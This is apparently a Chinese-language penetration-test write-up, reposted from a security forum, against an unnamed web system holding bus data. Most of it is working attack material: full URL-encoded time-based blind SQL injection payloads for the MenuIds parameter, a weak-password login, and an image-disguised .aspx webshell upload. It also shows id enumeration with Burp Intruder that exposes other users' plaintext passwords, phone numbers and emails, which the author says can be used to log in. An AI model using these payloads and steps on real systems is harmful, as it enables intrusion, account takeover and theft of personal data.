xhys121zero2025-09-24文章来源:SecHub网络安全社区
前台通过给的账号密码,进去
按顺序依次点击1、2、3,然后开启抓包点击4
抓下来数据包,到burp的重放模块
构造以下注入poc,可见注入延时了五秒,用户输入的语句成功拼接到原有的SQL语句上执行了
下面的poc是MenuIds的值
100%2C101%2C151%2C152%2C153%2C154%2C200%2C201%2C202%2C203%2C204%2C300%2C301%2C302%2C303%2C305%2C306%2C307%2C308%2C311%2C312%2C313%2C314%2C400%2C401%2C800%2C801%2C802%2C805%2C806%2C850%2C851%2C852%2C853%2C861%2C862%2C863%2C870%2C880%2C900%2C9070%2C9071%2C9080%2C9081%2C9082%2C9083%2C9084%2C9085%2C9086%2C9093'%3BWAITFOR%20DELAY%20'0%3A0%3A5'%20--
下面开始进行注入拿数据,构造下面poc,对数据库当前用户名进行查询
100%2C101%2C151%2C152%2C153%2C154%2C200%2C201%2C202%2C203%2C204%2C300%2C301%2C302%2C303%2C305%2C306%2C307%2C308%2C311%2C312%2C313%2C314%2C400%2C401%2C800%2C801%2C802%2C805%2C806%2C850%2C851%2C852%2C853%2C861%2C862%2C863%2C870%2C880%2C900%2C9070%2C9071%2C9080%2C9081%2C9082%2C9083%2C9084%2C9085%2C9086%2C9093'%3Bif(ascii(substring((select%20user)%2C1%2C1)))%3D116%20WAITFOR%20DELAY%20'0%3A0%3A5'%20--
成功延时5秒,说明数据库当前用户名第一个字母为t,下面继续对数据库用户名第N位字母进行猜解
然后拿到当前数据库名称,至此,sql注入漏洞验证完成
SQLMap进行自动化判断注入
http://xxxxxxxx/Home/Index#
弱口令进去,账号和密码是123456
上传文件头为图片格式的图片马,然后将上传的文件名后缀改成aspx
根据返回的内容打开对应url,然后即可看到webshell上传成功
跟上一步一样先弱口令进去,并在新建处抓包
图示数据包的id参数,为0表中的数据为空
将其改成1,2一直推下去,即可查到数据
=
遍历id参数从1-40,即可查到当前系统的所有公交信息
编辑这个地方抓包
然后将id值改为1
可以看见明文看见其他用户的账户密码、手机号、邮箱等敏感信息,我们可以利用这个信息进行登录等操作
再次将数据包转发到burp的Intruder模块,进行1-100遍历id值,可见也是将全站用户信息都可以遍历出来了
